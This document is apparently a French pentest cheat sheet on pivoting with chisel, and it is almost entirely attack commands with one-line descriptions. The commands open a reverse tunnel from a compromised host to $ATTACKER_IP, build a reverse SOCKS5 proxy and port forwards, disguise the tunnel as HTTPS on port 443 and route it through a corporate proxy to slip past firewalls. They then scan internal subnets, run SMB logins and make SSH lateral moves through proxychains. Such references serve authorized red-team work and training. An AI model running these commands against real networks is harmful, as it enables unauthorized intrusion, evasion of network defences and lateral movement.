chisel server --reverse --port 8080Description: Démarrer le serveur chisel en mode reverse : la cible initie la connexion vers nous.
Pivoting
Tunnels TCP/UDP over HTTP avec chisel : SOCKS5 reverse et port forwarding pour pivot réseau.
chisel server --reverse --port 8080Description: Démarrer le serveur chisel en mode reverse : la cible initie la connexion vers nous.
chisel client $ATTACKER_IP:8080 R:socksDescription: Créer un proxy SOCKS5 reverse : tout le trafic routé via la machine compromise.
chisel client $ATTACKER_IP:8080 R:$LOCAL_PORT:$INTERNAL_HOST:$REMOTE_PORTDescription: Port forward inverse : exposer un service interne directement sur notre machine.
chisel server --reverse --port 443 --tls-cert cert.pem --tls-key key.pemDescription: Chisel over TLS sur le port 443 : le trafic ressemble à du HTTPS pour les pare-feux.
chisel client --proxy $PROXY_URL $ATTACKER_IP:8080 R:socksDescription: Tunneler chisel via un proxy HTTP d'entreprise : contourner les restrictions réseau.
proxychains4 nxc smb $INTERNAL_TARGET -u $USER -p $PASSDescription: Utiliser proxychains via le SOCKS5 chisel pour atteindre des hosts internes.
proxychains4 -q nmap -sT -Pn -p 22,80,443,445,3389 $INTERNAL_SUBNETDescription: Scanner le réseau interne via proxychains : -sT obligatoire (pas de raw socket via SOCKS).
proxychains4 ssh $USER@$INTERNAL_HOSTDescription: SSH vers un host interne via le tunnel chisel : mouvement latéral discret.